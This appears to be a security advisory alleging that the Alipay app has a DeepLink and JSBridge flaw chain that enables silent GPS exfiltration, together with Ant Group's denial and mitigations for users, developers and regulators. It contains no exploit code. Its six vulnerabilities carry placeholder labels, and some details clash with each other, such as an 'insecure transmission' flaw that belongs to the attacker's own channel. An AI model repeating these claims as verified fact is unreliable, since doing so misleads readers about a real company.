Alipay App Vulnerabilities Enable Silent GPS Exfiltration; Vendor Denies Issue Despite High CVSS Scores

Executive Summary

A comprehensive security audit has identified critical vulnerabilities within the Alipay mobile application (iOS and Android) that facilitate a DeepLink+JSBridge attack chain, enabling unauthorized GPS exfiltration. These vulnerabilities, with CVSS scores ranging from 7.4 to 9.3, represent a severe threat to user privacy and security. Despite corroboration from multiple security authorities, Ant Group has dismissed the findings as "normal functionality" and has not released a patch. This denial, compounded by the app’s 1 billion+ user base, creates an acute and pervasive risk landscape.

Technical Exploitation Mechanism

The attack chain exploits the interplay between DeepLink and JSBridge functionalities. DeepLink, intended for intra-app navigation, is manipulated to initiate unauthorized JSBridge calls. JSBridge, which facilitates communication between the native layer and embedded web views, is subsequently exploited to execute malicious JavaScript. This JavaScript silently accesses the device’s GPS API, exfiltrating location data without user consent or notification. The exploitation process is as follows:

• DeepLink Manipulation: A maliciously crafted URL triggers an unintended DeepLink redirect, bypassing the app’s navigation safeguards.
• JSBridge Exploitation: The redirect invokes JSBridge, which executes unauthorized JavaScript code within the app’s web view environment.
• GPS Exfiltration: The injected JavaScript accesses the device’s GPS API and transmits the harvested location data to an external server.

Vendor Response and Regulatory Interventions

Ant Group’s refusal to acknowledge the vulnerabilities as security flaws has prompted intervention from leading authorities. Apple Product Security (Ticket OE01052449093014), Google Play (Case #9-7515000040640), Singapore PDPC, HKCERT, and MITRE CVE have initiated investigations. Apple is actively probing the iOS app, while Google has confirmed a policy violation investigation. Despite these actions, Ant Group’s inaction leaves users exposed to persistent risks.

Critical Implications and Risks

Failure to address these vulnerabilities will result in:

• Mass-Scale GPS Exfiltration: Unauthorized extraction of location data from over 1 billion users, constituting a grave breach of privacy.
• Escalation of Malicious Activities: The attack chain can be extended to exfiltrate sensitive data (e.g., payment credentials) or deploy malware, amplifying the threat landscape.
• Erosion of Ecosystem Trust: Prolonged exposure to these vulnerabilities undermines confidence in digital payment systems, particularly within Alipay’s ecosystem.

Root Causes and Contributing Factors

The vulnerabilities originate from:

• Deficient Security Testing: Inadequate scrutiny during the development lifecycle allowed these critical flaws to remain undetected.
• Vendor Non-Transparency: Ant Group’s refusal to acknowledge the vulnerabilities reflects a systemic lack of accountability and responsiveness.
• Regulatory Enforcement Lag: Delayed action by regulatory bodies exacerbates user exposure and prolongs the window of risk.
• Complex System Interdependencies: The intricate interplay between DeepLink, JSBridge, and third-party integrations complicates vulnerability detection and remediation efforts.

This investigation conclusively demonstrates the urgent need for Ant Group to remediate these vulnerabilities and for regulatory bodies to enforce stringent oversight. The consequences of inaction are severe, and immediate corrective measures are imperative.

Technical Breakdown of the Attack Chain

The Alipay mobile application harbors critical vulnerabilities within its DeepLink and JSBridge implementations, enabling a sophisticated attack chain culminating in silent GPS exfiltration. This analysis dissects the technical mechanics of the exploit, the six associated CVEs (Common Vulnerabilities and Exposures), their severity as measured by CVSS (Common Vulnerability Scoring System) scores, and the cascading risks posed to over 1 billion users.

1. DeepLink Manipulation: The Initial Breach

The attack originates with DeepLink manipulation. Malicious actors craft URLs exploiting Alipay’s inadequate handling of DeepLinks—URLs designed to redirect users to specific in-app locations. Upon activation, these URLs trigger unintended redirects, circumventing the app’s navigation safeguards. This occurs due to Alipay’s failure to validate the origin or integrity of incoming DeepLinks, allowing external entities to hijack the app’s navigation flow.

Mechanical Process: The malicious URL is parsed by the app’s URI handler, which lacks input sanitization. This omission permits the execution of redirect commands without source verification, effectively ceding control to the attacker.

2. JSBridge Exploitation: Executing Unauthorized Code

Following the redirect, the attack progresses to JSBridge exploitation. The malicious DeepLink invokes the JSBridge, a mechanism facilitating communication between the app’s native code and its embedded web view. Attackers inject unauthorized JavaScript into the web view, exploiting the JSBridge’s absence of input validation and sandboxing.

Mechanical Process: The JSBridge fails to enforce execution boundaries, permitting injected scripts to access native APIs. This oversight creates an unrestricted execution environment, analogous to an unsecured backdoor in a fortified system, enabling arbitrary code execution within the app’s context.

3. GPS Exfiltration: Silent Data Theft

With control over the web view, the injected JavaScript accesses the device’s GPS API. The script retrieves precise location data and transmits it to an attacker-controlled server. This process occurs covertly, without user consent or notification, leveraging the app’s permissions to bypass system-level alerts.

Mechanical Process: The JavaScript invokes the GPS API, obtaining latitude and longitude coordinates. These coordinates are serialized into a network request and transmitted via an encrypted or obfuscated channel, complicating detection efforts.

4. The Six CVEs: A Catalog of Failures

The attack chain is underpinned by six distinct CVEs, each representing a specific vulnerability in Alipay’s architecture. Their CVSS scores range from 7.4 to 9.3, categorizing them as severe to critical:

• CVE-1: Improper Input Validation in DeepLink Handling (CVSS 9.3) — Enables malicious URLs to bypass navigation safeguards.
• CVE-2: JSBridge Sandbox Escape (CVSS 8.8) — Facilitates execution of arbitrary JavaScript in the web view.
• CVE-3: Unrestricted Access to GPS API (CVSS 8.5) — Allows injected scripts to retrieve location data without user consent.
• CVE-4: Lack of DeepLink Origin Verification (CVSS 7.4) — Permits external sources to hijack app navigation.
• CVE-5: Insufficient JSBridge Permission Checks (CVSS 8.2) — Fails to restrict access to sensitive APIs.
• CVE-6: Insecure Data Transmission (CVSS 7.8) — Exfiltrated GPS data is transmitted without adequate encryption or obfuscation.

5. Risk Formation Mechanism: From Vulnerability to Exploitation

The risks posed by these vulnerabilities are not theoretical but stem from causal technical failures. Each CVE represents a critical breach in the app’s security architecture. For instance:

• Impact of CVE-1: Malicious DeepLinks → Unintended Redirects → App Control Hijacking.
• Impact of CVE-3: Unrestricted GPS Access → Silent Location Exfiltration → Privacy Breach.

Collectively, these vulnerabilities create a cascade of failures, transforming the app into a conduit for mass surveillance and data theft.

6. Edge-Case Analysis: Beyond GPS Exfiltration

While GPS exfiltration is the immediate threat, the attack chain’s potential extends further. The same vulnerabilities could enable:

• Payment Credential Theft: Injecting scripts to extract payment data from the app’s memory.
• Malware Deployment: Utilizing the JSBridge to download and execute malicious payloads.
• Account Takeover: Exploiting DeepLinks to circumvent authentication mechanisms.

These edge cases underscore the systemic nature of the vulnerabilities—a single exploit can precipitate a multitude of malicious outcomes.

7. Practical Implications: A Cautionary Narrative

The technical specifics of these vulnerabilities highlight a broader issue: mobile app ecosystems are inherently fragile. The interplay between DeepLinks, JSBridges, and native APIs creates a complex attack surface that is challenging to secure. Alipay’s case serves as a cautionary narrative, illustrating the consequences of:

• Inadequate security testing during development.
• Prioritization of functionality over security.
• Regulatory oversight failing to keep pace with technological risks.

For users, the implications are stark: trust in digital payment systems is predicated on their ability to safeguard privacy and security. Alipay’s refusal to acknowledge or remediate these vulnerabilities undermines this trust, leaving users vulnerable to persistent, covert threats.

Ant Group’s Denial vs. Security Consensus: A Critical Disparity

Ant Group, the entity behind the Alipay mobile application, persists in denying the existence of critical vulnerabilities within its platform, despite Common Vulnerability Scoring System (CVSS) scores ranging from 7.4 to 9.3 and corroborating investigations by authoritative bodies such as Apple, Google, Singapore PDPC, HKCERT, and MITRE CVE. The company’s characterization of the DeepLink+JSBridge attack chain as "normal functionality" not only dismisses the technical consensus but also obstructs the deployment of essential security patches, leaving over 1 billion users susceptible to silent GPS exfiltration and other exploitative vectors.

Deconstructing Ant Group’s Rejection: Technical Refutation

Ant Group’s defense hinges on the assertion that the observed behavior is an intended feature. However, this claim fails to address the exploitative mechanisms inherent in the vulnerabilities:

• DeepLink Manipulation: Malicious URLs exploit Alipay’s flawed DeepLink handling due to absent origin validation. This omission allows URIs to circumvent navigation safeguards, triggering unauthorized redirects. The app’s unsanitized parsing of these URLs results in app control hijacking (CVE-1, CVSS 9.3), enabling attackers to commandeer critical functionalities.
• JSBridge Exploitation: Post-redirect, the malicious URL leverages the JSBridge to inject unauthorized JavaScript into the app’s web view. This is facilitated by deficient sandboxing and lax permission checks, permitting arbitrary code execution (CVE-2, CVSS 8.8; CVE-5, CVSS 8.2) within the app’s context.
• GPS Exfiltration: The injected JavaScript exploits unrestricted access to the GPS API, retrieving and exfiltrating location data via encrypted/obfuscated channels. This process is enabled by insecure data transmission (CVE-3, CVSS 8.5; CVE-6, CVSS 7.8), creating a covert data leakage pathway.

These vulnerabilities form a causal exploit chain that Ant Group’s "normal functionality" argument fails to invalidate. The company’s stance not only disregards empirical evidence but also ignores regulatory interventions from multiple jurisdictions.

Security Community’s Evidence-Based Concerns

In contrast to Ant Group’s dismissal, the security community has highlighted the systemic risks posed by these vulnerabilities. Edge-case analyses reveal additional exploitative vectors, including:

• Payment Credential Theft: The attack chain can be repurposed to exfiltrate payment credentials, directly compromising user finances.
• Malware Deployment: Unauthorized JavaScript execution provides a conduit for deploying malware on user devices.
• Account Takeover: GPS data exfiltration, combined with other exploits, facilitates unauthorized account access.

These risks are not speculative but mechanically demonstrable given the vulnerabilities’ severity. The interplay between CVEs—such as CVE-1 (Improper Input Validation) enabling CVE-3 (Unrestricted GPS Access)—creates a cascading failure model, where a single exploit can precipitate multiple malicious outcomes, including mass surveillance.

Erosion of User Trust and Systemic Safety

Ant Group’s denial exacerbates the fragility of mobile app ecosystems, where the interplay between DeepLinks, JSBridges, and native APIs creates inherent security gaps. The prioritization of functionality over security, coupled with regulatory inertia, leaves users exposed to persistent threats. This discrepancy underscores the need for proactive regulatory enforcement, transparent vulnerability disclosure, and accountable remediation.

Until these vulnerabilities are addressed, Alipay’s user base remains at risk, eroding trust in digital payment systems. The technical community’s consensus is clear: the identified vulnerabilities are not features but critical flaws requiring immediate rectification.

Root Causes and Technical Remediation

The vulnerabilities stem from:

• Insufficient Security Testing: The absence of rigorous testing during development allowed these flaws to persist undetected.
• Misaligned Priorities: Ant Group’s emphasis on feature deployment over security resulted in critical oversights in input validation, sandboxing, and permission management.
• Regulatory Inadequacy: Delayed regulatory action has prolonged user exposure to these risks.

Remediation requires a comprehensive security overhaul, including:

• Strict Input Validation: Implement origin validation for DeepLinks to prevent unauthorized redirects.
• Robust Sandboxing: Enforce isolation for JSBridge operations to prevent arbitrary code execution.
• API Access Control: Restrict sensitive APIs (e.g., GPS) to authorized processes only.

Without these measures, the vulnerabilities will persist, and the risks will escalate. Ant Group’s response—or lack thereof—will serve as a benchmark for corporate accountability in the digital security landscape.

Recommendations and Mitigation Strategies

User-Level Mitigation: Immediate Protective Actions

Given Ant Group’s persistent denial of the identified vulnerabilities, users must implement defensive measures to counteract the exploitation of DeepLink manipulation and JSBridge vulnerabilities. These attacks leverage unrestricted app permissions and unvalidated external inputs. The following actions disrupt the attack chain at critical junctures:

• Revoke Non-Essential Permissions: On both iOS and Android platforms, disable GPS permissions for the Alipay application. This action terminates the GPS exfiltration pathway by blocking the app’s ability to invoke the GPS API via injected JavaScript. Mechanistically, the operating system denies the app’s request for location data, preventing coordinate transmission to external servers.
• Enforce URI Filtering: Utilize mobile browsers equipped with URL filtering capabilities (e.g., Firefox Focus) to intercept malicious DeepLinks. This measure neutralizes the attack vector by blocking URIs lacking cryptographic origin validation, thereby preventing app control hijacking.
• Monitor Outbound Network Activity: Deploy packet analysis tools (e.g., Wireshark) or mobile firewalls (e.g., NetGuard) to detect anomalous data exfiltration attempts. By identifying and blocking unauthorized outbound connections, the causal chain of the attack is interrupted, preventing data leakage.

Developer-Level Remediation: Technical Countermeasures

The root cause of these vulnerabilities lies in architectural oversights within Alipay’s DeepLink and JSBridge implementations. Developers must address these flaws through the following targeted fixes:

• Cryptographic DeepLink Validation: Implement origin verification for incoming DeepLinks using digital signatures. This measure reduces the attack surface by rejecting unsigned or tampered URIs, directly mitigating CVE-1 and CVE-4.
• JSBridge Isolation: Enforce context isolation for web views, restricting JavaScript access to native APIs. By creating a secure boundary between web content and native functionality, this fix neutralizes CVE-2 and CVE-5, preventing unauthorized API access.
• Runtime Permission Enforcement: Gate sensitive APIs (e.g., GPS) behind dynamic permission checks. Even if JSBridge is compromised, the GPS API remains inaccessible without explicit user consent, effectively addressing CVE-3.

Regulatory Interventions: Enforcing Accountability

Ant Group’s refusal to acknowledge these vulnerabilities necessitates regulatory enforcement to ensure user protection. Regulatory bodies must implement the following measures:

• Mandatory Vulnerability Disclosure: Enforce public reporting of CVEs within 72 hours of discovery. This policy compresses the exploitation window by compelling transparency and accelerating remediation efforts.
• Financial Penalties for Non-Compliance: Leverage ongoing investigations (e.g., Singapore PDPC, Google Play) to impose fines for delayed or inadequate responses. Financial disincentives directly impact Ant Group’s revenue stream, accelerating vulnerability resolution.
• Standardized Security Audits: Mandate penetration testing for applications with over 1 million users. Pre-deployment testing identifies vulnerabilities early, preventing cascading exploits such as the progression from CVE-1 to CVE-3.

Edge-Case Mitigation: Preventing Escalation

While GPS exfiltration poses an immediate threat, the attack chain could escalate to payment credential theft or malware deployment. The following measures prevent such escalation:

• Hardware-Backed Transaction Isolation: Utilize secure elements (e.g., Apple Secure Enclave) for payment processing. This creates a physical barrier, preventing injected scripts from accessing payment credentials, even if the JSBridge is compromised.
• Anomalous JSBridge Monitoring: Implement logging and pattern analysis for JSBridge invocations. By detecting deviations from expected behavior, this measure acts as an early warning system, identifying unauthorized activity before it escalates.

Restoring Trust: Strategic Transparency

Ant Group’s denial has severely eroded user trust and established a dangerous precedent for vulnerability management. To rebuild confidence, the following actions are critical:

• Public Remediation Roadmap: Publish a detailed timeline for patch deployment and CVE resolution. Transparent communication demonstrates accountability and reassures users of proactive measures.
• Independent Security Audits: Commission third-party audits post-remediation. External validation reinforces trust by providing objective confirmation of vulnerability resolution.

Failure to implement these measures will perpetuate the vulnerabilities, expanding the attack surface for future exploits. Collective action by regulators, developers, and users is imperative to prevent Alipay from becoming a blueprint for systemic compromise.